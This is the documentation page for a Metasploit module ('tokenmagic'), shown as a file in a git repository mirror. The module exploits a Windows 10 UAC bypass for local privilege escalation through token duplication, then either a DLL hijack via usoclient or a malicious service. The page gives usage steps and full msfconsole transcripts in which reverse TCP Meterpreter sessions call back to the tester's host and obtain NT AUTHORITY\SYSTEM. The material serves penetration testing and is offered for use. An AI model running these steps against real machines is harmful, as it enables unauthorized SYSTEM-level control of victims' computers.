adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
b112aae55c9c69ce00ce1fe4eb7eb3fa273ba7df
metasploit-gs/documentation/modules/exploit/windows/local/tokenmagic.md
T
Jack Heysel fab3a9afc8 Added wfsdelay, updated docs
2021-05-14 17:44:07 -05:00

9.1 KiB
Raw Blame History

Vulnerable Application

This module exploits a UAC-bypass in windows that allows the attacker to obtain remote code execution by leveraged a privileged file write. From the PoC:

Essentially we duplicate the token of an elevated process, lower it's mandatory integrity level, use it to create a new restricted token, impersonate it and use the Secondary Logon service to spawn a new process with High IL. Like playing hide-and-go-seek with tokens

The module exploits the high IL gained from the "token magic" by either starting a malicious service or by preforming a DLL hijack on a known DLL in system32.

Installation And Setup

Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on windows 10 instances up to 1803. Mileage may vary for the DLL hijack trigger in earlier versions of Windows 10

Verification Steps

  1. Start msfconsole
  2. Get at least a user shell

Run the token magic exploit: 2. Do: use exploit/windows/local/tokenmagic 3. Set the METHOD of exploitation, either DLL or SERVICE 4. Set the LHOST, SESSION and PAYLOAD options 5. Do: run 6. You should get a shell, the exploitation process should be fairly instantaneous

Options

METHOD Select between DLL hijacking and service exploitation DLL mode: using the elevated privileges from token magic the module will write a malicious file to c:\windows\system32\windowscoredeviceinfo.dll and use the usoclient to trigger the malicious dll with SYSTEM level privileges SERVICE mode: using the elevated privileges from token magic the module create a malicious service and then start it with SYSTEM level privileges

SERVICE_FILENAME
Filename for Service Payload (%RAND% by default).

SERVICE_NAME
Service Name to use (%RAND% by default).

SESSION
The session to run this module on.

WRITABLE_DIR Location of file to overwrite (%TEMP% by default).

Scenarios

Tested on Windows 10 x64 1803 (Build 17134) via DLL Hijacking

msf6 > use multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.199.1:4444 
[*] Sending stage (200262 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:49785) at 2021-05-11 19:24:16 -0400

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > use windows/local/tokenmagic
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > set LHOST 172.16.199.1
LHOST => 172.16.199.1
msf6 exploit(windows/local/tokenmagic) > set session 1
session => 1
msf6 exploit(windows/local/tokenmagic) > set lport 4443
lport => 4443
msf6 exploit(windows/local/tokenmagic) > set wfsdelday 900
wfsdelday => 900
msf6 exploit(windows/local/tokenmagic) > set method dll
method => dll
msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 172.16.199.1:4443 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Payload DLL is 8704 bytes long
[*] Attempting to PrivEsc on DESKTOP-O5RD7G3 via session ID: 1
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\WindowsCoreDeviceInfo.dll
[*] Running Exploit on DESKTOP-O5RD7G3
[*] Executing 
[*] Starting the interactive scan job...
[*] Trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 5524 launched.
[*] Reflectively injecting the trigger DLL into 5524...
[*] Trigger injected. Starting thread...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Enjoy the shell!
[*] Sending stage (200262 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:4443 -> 172.16.199.135:49792) at 2021-05-11 19:26:07 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-O5RD7G3
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >

Tested on Windows 10 x64 1703 (Build 15063) via service exploitation

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.199.1:4444 
[*] Sending stage (200262 bytes) to 172.16.199.133
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.133:49994) at 2021-05-07 15:04:19 -0400

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use windows/local/tokenmagic
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > show options

Module options (exploit/windows/local/tokenmagic):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   METHOD            SERVICE          yes       SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).
   SERVICE_FILENAME  kaOOacm          no        Filename for Service Payload (%RAND% by default).
   SERVICE_NAME      eNlQhw           no        Service Name to use (%RAND% by default).
   SESSION                            yes       The session to run this module on.
   WRITABLE_DIR                       no        Location of file to overwrite (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/tokenmagic) > set session 1
session => 1
msf6 exploit(windows/local/tokenmagic) > set LHOST 172.16.199.1
LHOST => 172.16.199.1 
msf6 exploit(windows/local/tokenmagic) > set LPORT 4443
LPORT => 4443
msf6 exploit(windows/local/tokenmagic) > show options

Module options (exploit/windows/local/tokenmagic):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   METHOD            SERVICE          yes       SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).
   SERVICE_FILENAME  kaOOacm          no        Filename for Service Payload (%RAND% by default).
   SERVICE_NAME      eNlQhw           no        Service Name to use (%RAND% by default).
   SESSION           1                yes       The session to run this module on.
   WRITABLE_DIR                       no        Location of file to overwrite (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 172.16.199.1:4443 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on DESKTOP-D6CQCM7 via session ID: 1
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\kaOOacm.exe
[*] Running Exploit on DESKTOP-D6CQCM7
[*] Sending stage (200262 bytes) to 172.16.199.133
[+] Deleted C:\Users\msfuser\AppData\Local\Temp\kaOOacm.exe
[*] Meterpreter session 2 opened (172.16.199.1:4443 -> 172.16.199.133:49995) at 2021-05-07 15:05:28 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-D6CQCM7
OS              : Windows 10 (10.0 Build 15063).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
Reference in New Issue View Git Blame Copy Permalink